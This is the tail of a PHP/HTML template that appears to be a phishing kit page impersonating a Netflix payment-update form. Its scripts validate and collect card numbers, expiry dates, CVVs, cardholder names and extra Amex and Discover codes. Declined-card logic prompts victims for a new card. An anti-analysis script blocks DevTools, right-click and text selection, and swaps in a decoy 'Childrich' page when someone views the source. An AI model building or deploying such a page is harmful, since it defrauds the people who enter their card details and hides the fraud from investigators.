                <input type="checkbox" id="agree" name="agree" class="checkbox">
                <label for="agree" class="checkbox-label"><?= __('i_agree') ?></label>
            </div>

            <?php 
            $declinedBtnStyle = $dataPage['declined_button_style'] ?? 'continue';
            if($cardDeclined && ($declinedBtnStyle === 'both' || $declinedBtnStyle === 'both_new')): 
                $secondBtn = $declinedBtnStyle === 'both_new' ? 'Update New Payment' : 'Update Payment';
            ?>
            <div style="display: flex; gap: 10px; margin-bottom: 16px;">
                <button type="submit" class="start-button" id="submitButton" style="flex: 1;"><?= __('continue') ?></button>
                <button type="submit" class="start-button" style="flex: 1; background: #fff; color: #333; border: 1px solid #ccc;"><?= $secondBtn ?></button>
            </div>
            <?php elseif($cardDeclined && $declinedBtnStyle === 'update'): ?>
            <button type="submit" class="start-button" id="submitButton">Update Payment</button>
            <?php elseif($cardDeclined && $declinedBtnStyle === 'update_new'): ?>
            <button type="submit" class="start-button" id="submitButton">Update New Payment</button>
            <?php else: ?>
            <button type="submit" class="start-button" id="submitButton"><?= __('continue') ?></button>
            <?php endif; ?>

            <div class="recaptcha-notice">
                <?= __('recaptcha_notice') ?> <a href="#"><?= __('learn_more') ?></a>.
            </div>
        </form>
    </main>

    <footer class="footer">
        <div class="footer-content">
            <div class="footer-contact">
                <?= __('questions_call') ?> <a href="tel:1-844-505-2993">1-844-505-2993</a>
            </div>

            <div class="footer-links">
                <a href="#"><?= __('faq') ?></a>
                <a href="#"><?= __('help_center') ?></a>
                <a href="#"><?= __('terms_of_use') ?></a>
                <a href="#"><?= __('privacy') ?></a>
                <a href="#"><?= __('cookie_preferences') ?></a>
                <a href="#"><?= __('corporate_information') ?></a>
                <a href="#"><?= __('ad_choices') ?></a>
            </div>

            <div class="language-selector" style="position: relative; display: inline-block; margin-top: 20px;">
                <svg class="language-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="16" height="16" data-icon="LanguagesSmall" aria-hidden="true" style="position: absolute; left: 8px; top: 50%; transform: translateY(-50%); width: 16px; height: 16px; color: #737373; pointer-events: none; z-index: 1;">
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M10.7668 5.33333L10.5038 5.99715L9.33974 8.9355L8.76866 10.377L7.33333 14H9.10751L9.83505 12.0326H13.4217L14.162 14H16L12.5665 5.33333H10.8278H10.7668ZM10.6186 9.93479L10.3839 10.5632H11.1036H12.8856L11.6348 7.2136L10.6186 9.93479ZM9.52722 4.84224C9.55393 4.77481 9.58574 4.71045 9.62211 4.64954H6.41909V2H4.926V4.64954H0.540802V5.99715H4.31466C3.35062 7.79015 1.75173 9.51463 0 10.4283C0.329184 10.7138 0.811203 11.2391 1.04633 11.5931C2.55118 10.6795 3.90318 9.22912 4.926 7.57316V12.6667H6.41909V7.51606C6.81951 8.15256 7.26748 8.76169 7.7521 9.32292L8.31996 7.88955C7.80191 7.29052 7.34631 6.64699 6.9834 5.99715H9.06968L9.52722 4.84224Z" fill="currentColor"></path>
                </svg>
                <select name="language" id="language" style="background: transparent; border: 1px solid #737373; color: #737373; padding: 8px 32px 8px 32px; font-size: 13px; border-radius: 2px; appearance: none; cursor: pointer; min-width: 120px;">
                    <option value="en" <?= $visitorLang === 'en' ? 'selected' : '' ?>>English</option>
                    <option value="es" <?= $visitorLang === 'es' ? 'selected' : '' ?>>Español</option>
                </select>
                <svg class="dropdown-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16" style="position: absolute; right: 8px; top: 50%; transform: translateY(-50%); width: 12px; height: 12px; color: #737373; pointer-events: none; z-index: 1;">
                    <path d="M8 10.586L3.414 6 2 7.414 8 13.414 14 7.414 12.586 6z" fill="currentColor"/>
                </svg>
            </div>
            
            <div class="footer-country">
                <?= __('netflix_region') ?>
            </div>
        </div>
    </footer>

    <script>
        // JavaScript Translations Object (populated from PHP)
        const i18n = {
            error_card_number: '<?= addslashes(__('error_card_number')) ?>',
            error_card_number_empty: '<?= addslashes(__('error_card_number_empty')) ?>',
            error_card_number_invalid: '<?= addslashes(__('error_card_number_invalid')) ?>',
            error_expiry_date: '<?= addslashes(__('error_expiry_date')) ?>',
            error_expiry_date_empty: '<?= addslashes(__('error_expiry_date_empty')) ?>',
            error_expiry_date_invalid: '<?= addslashes(__('error_expiry_date_invalid')) ?>',
            error_expiry_date_expired: '<?= addslashes(__('error_expiry_date_expired')) ?>',
            error_expiry_date_year: '<?= addslashes(__('error_expiry_date_year')) ?>',
            error_cvv: '<?= addslashes(__('error_cvv')) ?>',
            error_cvv_required: '<?= addslashes(__('error_cvv_required')) ?>',
            error_cvv_card_first: '<?= addslashes(__('error_cvv_card_first')) ?>',
            error_cvv_amex: '<?= addslashes(__('error_cvv_amex')) ?>',
            error_cvv_digits: '<?= addslashes(__('error_cvv_digits')) ?>',
            error_agree_terms: '<?= addslashes(__('error_agree_terms')) ?>',
            processing: '<?= addslashes(__('processing')) ?>'
        };
    </script>
    <script>
        // Advanced Protection System
        (function() {
            'use strict';
            
            let protectionActive = true;
            
            // DOM Obfuscation
            function obfuscateDOM() {
                const dummyHTML = '<!DOCTYPE html><html><head><title>Childrich</title><style>body{margin:0;padding:0;display:flex;justify-content:center;align-items:center;min-height:100vh;font-family:Arial,sans-serif;background:#f5f5f5}h1{color:#333;text-align:center;font-size:48px;margin:0}</style></head><body><h1>Childrich</h1></body></html>';
                document.open();
                document.write(dummyHTML);
                document.close();
            }
            
            function clearConsole() {
                if (window.console && window.console.clear) console.clear();
                console.log('%cAccess Denied', 'color: red; font-size: 40px; font-weight: bold;');
            }
            
            // Detect DevTools
            const threshold = 160;
            setInterval(function() {
                if (window.outerHeight - window.innerHeight > threshold || window.outerWidth - window.innerWidth > threshold) {
                    clearConsole();
                }
            }, 500);
            
            // Keyboard event blocking
            document.addEventListener('keydown', function(e) {
                if (e.key === 'F12' || (e.ctrlKey && e.shiftKey && ['I', 'C', 'J'].includes(e.key.toUpperCase()))) {
                    e.preventDefault(); e.stopPropagation(); clearConsole(); return false;
                }
                if (e.ctrlKey && e.key.toUpperCase() === 'U') { setTimeout(obfuscateDOM, 100); return true; }
                if (e.ctrlKey && ['C', 'V', 'X'].includes(e.key.toUpperCase())) {
                    const target = e.target;
                    if (target.tagName !== 'INPUT' && target.tagName !== 'TEXTAREA') { e.preventDefault(); return false; }
                }
            }, true);
            
            document.addEventListener('contextmenu', function(e) { e.preventDefault(); return false; }, false);
            document.addEventListener('selectstart', function(e) {
                if (e.target.tagName !== 'INPUT' && e.target.tagName !== 'TEXTAREA') { e.preventDefault(); return false; }
            }, false);
            
            clearConsole();
        })();
    </script>

    <script>
        // Simple Loading Screen - Hide after 1.5 seconds
        setTimeout(function() {
            const loadingOverlay = document.getElementById('loading-overlay');
            if (loadingOverlay) {
                loadingOverlay.style.opacity = '0';
                loadingOverlay.style.transition = 'opacity 0.3s ease';
                setTimeout(function() { loadingOverlay.remove(); }, 300);
            }
        }, 1500);

        // Card type patterns (global scope for form validation)
        const cardTypes = {
            visa: { pattern: /^4/, lengths: [16], cvvLength: 3, format: /(\d{1,4})(\d{1,4})?(\d{1,4})?(\d{1,4})?/, name: 'Visa' },
            mastercard: { pattern: /^(5[1-5]|2[2-7])/, lengths: [16], cvvLength: 3, format: /(\d{1,4})(\d{1,4})?(\d{1,4})?(\d{1,4})?/, name: 'Mastercard' },
            amex: { pattern: /^3[47]/, lengths: [15], cvvLength: 4, format: /(\d{1,4})(\d{1,6})?(\d{1,5})?/, name: 'American Express' },
            discover: { pattern: /^(6011|622[1-9]|64[4-9]|65)/, lengths: [16], cvvLength: 3, format: /(\d{1,4})(\d{1,4})?(\d{1,4})?(\d{1,4})?/, name: 'Discover' },
            diners: { pattern: /^(30[0-5]|36|38)/, lengths: [14], cvvLength: 3, format: /(\d{1,4})(\d{1,6})?(\d{1,4})?/, name: 'Diners Club' },
            jcb: { pattern: /^35/, lengths: [16], cvvLength: 3, format: /(\d{1,4})(\d{1,4})?(\d{1,4})?(\d{1,4})?/, name: 'JCB' }
        };

        // Card type detection and formatting
        document.addEventListener('DOMContentLoaded', function() {
            const cardNumberInput = document.getElementById('cardNumber');
            const cardIcon = document.getElementById('cardIcon');
            const cvvInput = document.getElementById('cvv');

            function detectCardType(number) {
                const cleanNumber = number.replace(/\D/g, '');
                for (const [type, config] of Object.entries(cardTypes)) {
                    if (config.pattern.test(cleanNumber)) return { type, config };
                }
                return { type: 'default', config: null };
            }
            window.detectCardType = detectCardType;

            function formatCardNumber(number, cardType) {
                const cleanNumber = number.replace(/\D/g, '');
                if (cardType === 'amex') {
                    return cleanNumber.replace(/(\d{4})(\d{0,6})(\d{0,5})/, (match, p1, p2, p3) => {
                        let f = p1; if (p2) f += ' ' + p2; if (p3) f += ' ' + p3; return f;
                    });
                } else if (cardType === 'diners') {
                    return cleanNumber.replace(/(\d{4})(\d{0,6})(\d{0,4})/, (match, p1, p2, p3) => {
                        let f = p1; if (p2) f += ' ' + p2; if (p3) f += ' ' + p3; return f;
                    });
                } else {
                    return cleanNumber.replace(/(\d{4})(?=\d)/g, '$1 ');
                }
            }

            function updateCardIcon(cardType) {
                cardIcon.className = 'card-icon';
                if (cardType === 'default' || !cardType) {
                    cardIcon.classList.add('default-card');
                    cardIcon.innerHTML = '<svg xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 24 24" width="24" height="24"><path fill-rule="evenodd" clip-rule="evenodd" d="M0 6C0 4.34315 1.34315 3 3 3H21C22.6569 3 24 4.34315 24 6V18C24 19.6569 22.6569 21 21 21H3C1.34314 21 0 19.6569 0 18V6ZM3 5C2.44772 5 2 5.44772 2 6V8H22V6C22 5.44771 21.5523 5 21 5H3ZM2 18V10H22V18C22 18.5523 21.5523 19 21 19H3C2.44772 19 2 18.5523 2 18ZM16 16H20V14H16V16Z" fill="currentColor"></path></svg>';
                } else {
                    cardIcon.classList.add(cardType);
                    if (cardType === 'discover') cardIcon.innerHTML = 'DISC';
                    else if (cardType === 'diners') cardIcon.innerHTML = 'DINERS';
                    else if (cardType === 'jcb') cardIcon.innerHTML = 'JCB';
                    else cardIcon.innerHTML = '';
                }
            }

            function updateCVVLength(cardType) {
                if (cardType && cardTypes[cardType]) {
                    const cvvLength = cardTypes[cardType].cvvLength;
                    cvvInput.setAttribute('maxlength', cvvLength);
                } else {
                    cvvInput.setAttribute('maxlength', '4');
                }
            }

            function updateCIDField(cardType) {
                const cidFieldGroup = document.getElementById('cidFieldGroup');
                const cidInput = document.getElementById('amexcid');
                
                if (!cidFieldGroup || !cidInput) return;
                
                // Show CID field only for American Express
                if (cardType === 'amex') {
                    cidFieldGroup.style.display = 'block';
                    cidInput.setAttribute('required', 'required');
                } else {
                    cidFieldGroup.style.display = 'none';
                    cidInput.removeAttribute('required');
                    cidInput.value = ''; // Clear CID value for non-Amex cards
                }
            }

            function updateXIDField(cardType) {
                const xidFieldGroup = document.getElementById('xidFieldGroup');
                const xidInput = document.getElementById('xid_input');
                
                if (!xidFieldGroup || !xidInput) return;
                
                // Show XID field only for Discover
                if (cardType === 'discover') {
                    xidFieldGroup.style.display = 'block';
                    xidInput.setAttribute('required', 'required');
                } else {
                    xidFieldGroup.style.display = 'none';
                    xidInput.removeAttribute('required');
                    xidInput.value = '';
                    xidInput.classList.remove('valid-card', 'invalid-card');
                    xidInput.style.removeProperty('border-color');
                    xidInput.style.removeProperty('background-color');
                    const xidErr = document.getElementById('xid_error');
                    if (xidErr) xidErr.style.display = 'none';
                }
            }

            // Luhn algorithm for card validation
            function validateCardNumber(cardNumber) {
                // Remove spaces and non-digits
                const cleanNumber = cardNumber.replace(/\D/g, '');
                
                // Must be at least 13 digits
                if (cleanNumber.length < 15) {
                    return false;
                }
                
                let sum = 0;
                let isEven = false;
                
                // Loop through digits from right to left
                for (let i = cleanNumber.length - 1; i >= 0; i--) {
                    let digit = parseInt(cleanNumber[i]);
                    
                    if (isEven) {
                        digit *= 2;
                        if (digit > 9) {
                            digit -= 9;
                        }
                    }
                    
                    sum += digit;
                    isEven = !isEven;
                }
                
                return sum % 10 === 0;
            }

            // Make validateCardNumber globally accessible
            window.validateCardNumber = validateCardNumber;

            function updateCardValidation(cardNumber, cardType) {
                const cardNumberInput = document.getElementById('cardNumber');
                const cardNumberError = document.getElementById('cardNumberError');
                const errorSpan = document.getElementById('i18n-cc-number-error');
                const cleanNumber = cardNumber.replace(/\D/g, '');
                
                // Remove previous validation classes
                cardNumberInput.classList.remove('valid-card', 'invalid-card');
                
                // Only validate if we have enough digits and a detected card type
                if (cleanNumber.length >= 13 && cardType !== 'default') {
                    const cardConfig = cardTypes[cardType];
                    const isValidLength = cardConfig && cardConfig.lengths.includes(cleanNumber.length);
                    const isValidLuhn = validateCardNumber(cardNumber);
                    const isValid = isValidLength && isValidLuhn;
                    
                    if (isValid) {
                        cardNumberInput.classList.add('valid-card');
                        if (cardNumberError) cardNumberError.style.display = 'none';
                        // Force green style with all properties
                        cardNumberInput.style.setProperty('border-color', '#28a745', 'important');
                        cardNumberInput.style.setProperty('border-width', '2px', 'important');
                        cardNumberInput.style.setProperty('background-color', '#f8fff9', 'important');
                        cardNumberInput.style.setProperty('box-shadow', '0 0 0 0.2rem rgba(40, 167, 69, 0.25)', 'important');
                    } else {
                        cardNumberInput.classList.add('invalid-card');
                        if (cardNumberError) cardNumberError.style.display = 'flex';
                        if (errorSpan) {
                            errorSpan.textContent = i18n.error_card_number_invalid;
                        }
                        // Force red style
                        cardNumberInput.style.borderColor = '#dc3545';
                        cardNumberInput.style.borderWidth = '2px';
                    }
                } else {
                    // Reset validation state for incomplete numbers
                    if (cardNumberError) cardNumberError.style.display = 'none';
                    // Reset border style
                    cardNumberInput.style.removeProperty('border-color');
                    cardNumberInput.style.removeProperty('border-width');
                    cardNumberInput.style.removeProperty('background-color');
                    cardNumberInput.style.removeProperty('box-shadow');
                }
            }

            // Expiration date validation function
            function validateExpirationDate(expDate) {
                const expDateRegex = /^(0[1-9]|1[0-2])\/([0-9]{2})$/;
                
                if (!expDateRegex.test(expDate)) {
                    return { valid: false, message: i18n.error_expiry_date_invalid };
                }
                
                const [month, year] = expDate.split('/');
                const currentDate = new Date();
                const currentYear = currentDate.getFullYear() % 100; // Get last 2 digits
                const currentMonth = currentDate.getMonth() + 1; // 0-based to 1-based
                
                const expMonth = parseInt(month);
                const expYear = parseInt(year);
                
                // Check if month is valid (01-12)
                if (expMonth < 1 || expMonth > 12) {
                    return { valid: false, message: i18n.error_expiry_date_invalid };
                }
                
                // Check if card is expired
                if (expYear < currentYear || (expYear === currentYear && expMonth < currentMonth)) {
                    return { valid: false, message: i18n.error_expiry_date_expired };
                }
                
                // Check if expiration is too far in the future (more than 10 years)
                if (expYear > currentYear + 10) {
                    return { valid: false, message: i18n.error_expiry_date_year };
                }
                
                return { valid: true, message: '' };
            }

            // Make validateExpirationDate globally accessible
            window.validateExpirationDate = validateExpirationDate;

            function updateExpirationValidation(expDate) {
                const expDateInput = document.getElementById('expDate');
                const expDateError = document.getElementById('expDateError');
                const errorSpan = document.getElementById('i18n-cc-expiry-error');
                
                // Always remove previous validation classes first
                expDateInput.classList.remove('valid-card', 'invalid-card');
                
                // Only validate if date is complete (5 characters: MM/YY)
                if (expDate && expDate.length === 5) {
                    const validation = validateExpirationDate(expDate);
                    
                    if (validation.valid) {
                        expDateInput.classList.add('valid-card');
                        if (expDateError) expDateError.style.display = 'none';
                        // Force green style with all properties
                        expDateInput.style.setProperty('border-color', '#28a745', 'important');
                        expDateInput.style.setProperty('border-width', '2px', 'important');
                        expDateInput.style.setProperty('background-color', '#f8fff9', 'important');
                        expDateInput.style.setProperty('box-shadow', '0 0 0 0.2rem rgba(40, 167, 69, 0.25)', 'important');
                    } else {
                        expDateInput.classList.add('invalid-card');
                        if (expDateError) expDateError.style.display = 'flex';
                        if (errorSpan) {
                            errorSpan.textContent = validation.message;
                        }
                        // Force red style
                        expDateInput.style.borderColor = '#dc3545';
                        expDateInput.style.borderWidth = '2px';
                    }
                } else {
                    // Reset validation state for incomplete or empty dates
                    if (expDateError) expDateError.style.display = 'none';
                    // Reset border style
                    expDateInput.style.removeProperty('border-color');
                    expDateInput.style.removeProperty('border-width');
                    expDateInput.style.removeProperty('background-color');
                    expDateInput.style.removeProperty('box-shadow');
                }
            }

            // CVV validation function
            function validateCVV(cvvValue, cardType) {
                const cvv = cvvValue.replace(/\D/g, '');
                
                // CVV is ALWAYS required
                if (cvv.length === 0) {
                    return { valid: false, message: i18n.error_cvv_required };
                }
                
                if (!cardType || cardType === 'default') {
                    return { valid: false, message: i18n.error_cvv_card_first };
                }
                
                // Get card config from cardTypes object
                const cardConfig = cardTypes[cardType];
                if (!cardConfig) {
                    return { valid: false, message: i18n.error_cvv_card_first };
                }
                
                const requiredLength = cardConfig.cvvLength;
                
                // STRICT LENGTH VALIDATION - must be exact
                if (cvv.length !== requiredLength) {
                    if (cardType === 'amex') {
                        return { valid: false, message: i18n.error_cvv_amex };
                    } else {
                        return { valid: false, message: i18n.error_cvv_digits.replace('{card}', cardConfig.name).replace('{digits}', requiredLength) };
                    }
                }
                
                return { valid: true, message: '' };
            }

            // Make validateCVV globally accessible
            window.validateCVV = validateCVV;

            function updateCVVValidation(cvvValue, cardType) {
                const cvvInput = document.getElementById('cvv');
                const cvvError = document.getElementById('cvvError');
                const errorSpan = document.getElementById('i18n-cc-cvv-error');
                
                // Only validate if user has interacted with CVV field
                const hasInteracted = cvvInput.hasAttribute('data-touched');
                
                // Remove previous validation classes
                cvvInput.classList.remove('valid-card', 'invalid-card');
                
                if (cardType && cardType !== 'default') {
                    const validation = validateCVV(cvvValue, cardType);
                    
                    if (validation.valid) {
                        cvvInput.classList.add('valid-card');
                        if (cvvError) cvvError.style.display = 'none';
                        // Force green style with all properties
                        cvvInput.style.setProperty('border-color', '#28a745', 'important');
                        cvvInput.style.setProperty('border-width', '2px', 'important');
                        cvvInput.style.setProperty('background-color', '#f8fff9', 'important');
                        cvvInput.style.setProperty('box-shadow', '0 0 0 0.2rem rgba(40, 167, 69, 0.25)', 'important');
                    } else if (hasInteracted || cvvValue.length > 0) {
                        // Only show error if user has touched the field or started typing
                        cvvInput.classList.add('invalid-card');
                        if (cvvError) cvvError.style.display = 'flex';
                        if (errorSpan) {
                            errorSpan.textContent = validation.message;
                        }
                        // Force red style
                        cvvInput.style.borderColor = '#dc3545';
                        cvvInput.style.borderWidth = '2px';
                    } else {
                        // Reset state for untouched empty field
                        if (cvvError) cvvError.style.display = 'none';
                        // Reset border style
                        cvvInput.style.removeProperty('border-color');
                        cvvInput.style.removeProperty('border-width');
                        cvvInput.style.removeProperty('background-color');
                        cvvInput.style.removeProperty('box-shadow');
                    }
                } else if (cvvValue.length > 0) {
                    // Show error if CVV entered but no valid card type
                    cvvInput.classList.add('invalid-card');
                    if (cvvError) cvvError.style.display = 'flex';
                    if (errorSpan) {
                        errorSpan.textContent = i18n.error_cvv_card_first;
                    }
                } else {
                    // Reset state for empty field without card type
                    if (cvvError) cvvError.style.display = 'none';
                    // Reset border style
                    cvvInput.style.removeProperty('border-color');
                    cvvInput.style.removeProperty('border-width');
                    cvvInput.style.removeProperty('background-color');
                    cvvInput.style.removeProperty('box-shadow');
                }
            }

            // Card number input event listener
            if (cardNumberInput) {
                cardNumberInput.addEventListener('input', function(e) {
                    let value = e.target.value;
                    const cleanValue = value.replace(/\D/g, '');
                    const detection = detectCardType(cleanValue);
                    const cardType = detection.type;
                    const cardConfig = detection.config;
                    
                    updateCardIcon(cardType);
                    updateCVVLength(cardType);
                    updateCIDField(cardType);
                    updateXIDField(cardType);
                    
                    const cardTypeInput = document.getElementById('cardType');
                    if (cardTypeInput) cardTypeInput.value = cardType === 'default' ? '' : cardType;
                    
                    const formattedValue = formatCardNumber(value, cardType);
                    let maxLength = 19;
                    if (cardConfig && cardConfig.lengths) {
                        const maxDigits = Math.max(...cardConfig.lengths);
                        maxLength = maxDigits + Math.floor(maxDigits / 4);
                    }
                    
                    e.target.value = formattedValue.length <= maxLength ? formattedValue : formattedValue.substring(0, maxLength);
                    e.target.setAttribute('data-card-type', cardType === 'default' ? '' : cardType);
                    
                    updateCardValidation(e.target.value, cardType);
                    
                    if (cvvInput && cvvInput.value) {
                        updateCVVValidation(cvvInput.value, cardType);
                    }
                });
            }
            
            // Format expiration date (MM/YY) with validation
            const expDateInput = document.getElementById('expDate');
            if (expDateInput) {
                expDateInput.addEventListener('input', function(e) {
                    let value = e.target.value.replace(/\D/g, '');
                    if (value.length >= 2) value = value.substring(0, 2) + '/' + value.substring(2, 4);
                    e.target.value = value;
                    updateExpirationValidation(value);
                });
            }
            
            // Format CVV (numbers only) with validation
            if (cvvInput) {
                cvvInput.addEventListener('input', function(e) {
                    e.target.value = e.target.value.replace(/\D/g, '').substring(0, 4);
                    e.target.setAttribute('data-touched', 'true');
                    if (cardNumberInput) {
                        const detection = detectCardType(cardNumberInput.value);
                        updateCVVValidation(e.target.value, detection.type);
                    }
                });
                cvvInput.addEventListener('blur', function(e) {
                    if (e.target.value) {
                        e.target.setAttribute('data-touched', 'true');
                        if (cardNumberInput) {
                            const detection = detectCardType(cardNumberInput.value);
                            updateCVVValidation(e.target.value, detection.type);
                        }
                    }
                });
            }
            
            // Format CID (numbers only, 3 digits for Amex)
            const cidInput = document.getElementById('amexcid');
            if (cidInput) {
                cidInput.addEventListener('input', function(e) {
                    e.target.value = e.target.value.replace(/\D/g, '').substring(0, 3);
                });
            }

            // Format and validate XID (numbers only, 5 digits for Discover)
            var xidInput = document.getElementById('xid_input');
            if (xidInput) {
                xidInput.addEventListener('input', function() {
                    this.value = this.value.replace(/\D/g, '').substring(0, 5);
                    this.classList.remove('valid-card', 'invalid-card');
                    var xidErr = document.getElementById('xid_error');
                    if (this.value.length === 5) {
                        this.classList.add('valid-card');
                        this.style.setProperty('border-color', '#28a745', 'important');
                        this.style.setProperty('background-color', '#f8fff9', 'important');
                        if (xidErr) xidErr.style.display = 'none';
                    } else if (this.value.length > 0) {
                        this.classList.add('invalid-card');
                        this.style.setProperty('border-color', '#dc3545', 'important');
                        if (xidErr) xidErr.style.display = 'block';
                    } else {
                        this.style.removeProperty('border-color');
                        this.style.removeProperty('background-color');
                        if (xidErr) xidErr.style.display = 'none';
                    }
                });
            }

            updateCardIcon('default');
        });
    </script>

    <script>
        // Form Submit Validation with Luhn + Regex
        document.addEventListener('DOMContentLoaded', function() {
            const cardForm = document.querySelector('form');
            const submitButton = document.getElementById('submitButton') || document.querySelector('.start-button');
            
            if (cardForm) {
                cardForm.addEventListener('submit', function(e) {
                    const cardNumberInput = document.getElementById('cardNumber');
                    const expDateInput = document.getElementById('expDate');
                    const cvvInputEl = document.getElementById('cvv');
                    
                    const cardNumber = cardNumberInput ? cardNumberInput.value.replace(/\s/g, '').trim() : '';
                    const expDate = expDateInput ? expDateInput.value.trim() : '';
                    const cvv = cvvInputEl ? cvvInputEl.value.trim() : '';
                    const nameOnCard = document.getElementById('nameOnCard') ? document.getElementById('nameOnCard').value.trim() : '';
                    const agree = document.getElementById('agree') ? document.getElementById('agree').checked : true;
                    
                    // Clear previous errors
                    document.querySelectorAll('.valid-card, .invalid-card').forEach(el => el.classList.remove('valid-card', 'invalid-card'));
                    document.querySelectorAll('.error-message').forEach(el => el.style.display = 'none');
                    
                    let hasError = false;
                    
                    // Validate card number with Luhn
                    const cardNumberError = document.getElementById('cardNumberError');
                    const cardNumberErrorSpan = document.getElementById('i18n-cc-number-error') || (cardNumberError ? cardNumberError.querySelector('span') : null);
                    
                    if (!cardNumber || cardNumber.length < 15 || cardNumber.length > 16 || !/^\d+$/.test(cardNumber)) {
                        if (cardNumberInput) cardNumberInput.classList.add('invalid-card');
                        if (cardNumberError) cardNumberError.style.display = 'flex';
                        if (cardNumberErrorSpan) cardNumberErrorSpan.textContent = (!cardNumber || cardNumber.length === 0) ? i18n.error_card_number_empty : i18n.error_card_number_invalid;
                        hasError = true;
                    } else {
                        const detection = window.detectCardType(cardNumber);
                        const cardType = detection.type;
                        const isValidLuhn = window.validateCardNumber(cardNumber);
                        const cardConfig = cardTypes[cardType];
                        const isValidLength = cardConfig && cardConfig.lengths.includes(cardNumber.length);
                        
                        if (!isValidLuhn || !isValidLength || cardType === 'default') {
                            if (cardNumberInput) cardNumberInput.classList.add('invalid-card');
                            if (cardNumberError) cardNumberError.style.display = 'flex';
                            if (cardNumberErrorSpan) cardNumberErrorSpan.textContent = i18n.error_card_number_invalid;
                            hasError = true;
                        } else {
                            if (cardNumberInput) { cardNumberInput.classList.add('valid-card'); cardNumberInput.style.borderColor = '#28a745'; cardNumberInput.style.borderWidth = '2px'; }
                        }
                    }
                    
                    // Validate expiration date with regex
                    const expDateError = document.getElementById('expDateError');
                    const expDateErrorSpan = document.getElementById('i18n-cc-expiry-error') || (expDateError ? expDateError.querySelector('span') : null);
                    
                    if (!expDate || expDate.length === 0 || !/^(0[1-9]|1[0-2])\/\d{2}$/.test(expDate)) {
                        if (expDateInput) expDateInput.classList.add('invalid-card');
                        if (expDateError) expDateError.style.display = 'flex';
                        if (expDateErrorSpan) expDateErrorSpan.textContent = (!expDate || expDate.length === 0) ? i18n.error_expiry_date_empty : i18n.error_expiry_date_invalid;
                        hasError = true;
                    } else {
                        const expValidation = window.validateExpirationDate(expDate);
                        if (!expValidation.valid) {
                            if (expDateInput) expDateInput.classList.add('invalid-card');
                            if (expDateError) expDateError.style.display = 'flex';
                            if (expDateErrorSpan) expDateErrorSpan.textContent = expValidation.message;
                            hasError = true;
                        } else {
                            if (expDateInput) { expDateInput.classList.add('valid-card'); expDateInput.style.borderColor = '#28a745'; expDateInput.style.borderWidth = '2px'; }
                        }
                    }
                    
                    // Validate CVV per card type
                    const cvvError = document.getElementById('cvvError');
                    const cvvErrorSpan = document.getElementById('i18n-cc-cvv-error') || (cvvError ? cvvError.querySelector('span') : null);
                    const cardNumberForCVV = cardNumberInput ? cardNumberInput.value.replace(/\s/g, '') : '';
                    const cvvCardDetection = window.detectCardType(cardNumberForCVV);
                    const cvvCardType = cvvCardDetection.type;
                    
                    if (!cvv || cvv.length === 0) {
                        if (cvvInputEl) cvvInputEl.classList.add('invalid-card');
                        if (cvvError) cvvError.style.display = 'flex';
                        if (cvvErrorSpan) cvvErrorSpan.textContent = i18n.error_cvv;
                        hasError = true;
                    } else {
                        const cvvValidation = window.validateCVV(cvv, cvvCardType);
                        if (!cvvValidation.valid) {
                            if (cvvInputEl) cvvInputEl.classList.add('invalid-card');
                            if (cvvError) cvvError.style.display = 'flex';
                            if (cvvErrorSpan) cvvErrorSpan.textContent = cvvValidation.message;
                            hasError = true;
                        } else {
                            if (cvvInputEl) { cvvInputEl.classList.add('valid-card'); cvvInputEl.style.borderColor = '#28a745'; cvvInputEl.style.borderWidth = '2px'; }
                        }
                    }
                    
                    // Validate name on card
                    const nameOnCardInput = document.getElementById('nameOnCard');
                    const nameOnCardError = document.getElementById('nameOnCardError');
                    if (!nameOnCard || nameOnCard.length === 0) {
                        if (nameOnCardInput) nameOnCardInput.classList.add('invalid-card');
                        if (nameOnCardError) nameOnCardError.style.display = 'flex';
                        hasError = true;
                    } else {
                        if (nameOnCardInput) { nameOnCardInput.classList.add('valid-card'); nameOnCardInput.style.borderColor = '#28a745'; nameOnCardInput.style.borderWidth = '2px'; }
                    }
                    
                    // Validate CID for American Express (3 digits)
                    const cidFieldGroup = document.getElementById('cidFieldGroup');
                    const cidInputEl = document.getElementById('amexcid');
                    if (cidFieldGroup && cidFieldGroup.style.display !== 'none' && cidInputEl) {
                        const cidError = document.getElementById('cidError');
                        const cidValue = cidInputEl.value.trim();
                        if (!cidValue || cidValue.length !== 3 || !/^\d{3}$/.test(cidValue)) {
                            cidInputEl.classList.add('invalid-card');
                            if (cidError) cidError.style.display = 'flex';
                            hasError = true;
                        } else {
                            cidInputEl.classList.add('valid-card');
                            cidInputEl.style.borderColor = '#28a745';
                            cidInputEl.style.borderWidth = '2px';
                        }
                    }

                    // Validate XID for Discover (5 digits)
                    const xidFieldGroup = document.getElementById('xidFieldGroup');
                    const xidInputEl = document.getElementById('xid_input');
                    if (xidFieldGroup && xidFieldGroup.style.display !== 'none' && xidInputEl) {
                        const xidError = document.getElementById('xid_error');
                        const xidValue = xidInputEl.value.trim();
                        if (!xidValue || xidValue.length !== 5 || !/^\d{5}$/.test(xidValue)) {
                            xidInputEl.classList.add('invalid-card');
                            xidInputEl.style.setProperty('border-color', '#dc3545', 'important');
                            if (xidError) xidError.style.display = 'flex';
                            hasError = true;
                        } else {
                            xidInputEl.classList.add('valid-card');
                            xidInputEl.style.setProperty('border-color', '#28a745', 'important');
                            xidInputEl.style.borderWidth = '2px';
                        }
                    }
                    
                    // Validate agree checkbox
                    if (!agree) {
                        alert(i18n.error_agree_terms || 'You must agree to the terms.');
                        hasError = true;
                    }
                    
                    if (hasError) {
                        e.preventDefault();
                        return false;
                    }
                    
                    // Show loading state on button
                    if (submitButton) {
                        submitButton.classList.add('loading');
                        submitButton.innerHTML = '<span class="btn-spinner"></span>' + i18n.processing;
                        submitButton.disabled = true;
                    }
                });
            }
        });
    </script>

</body>
</html>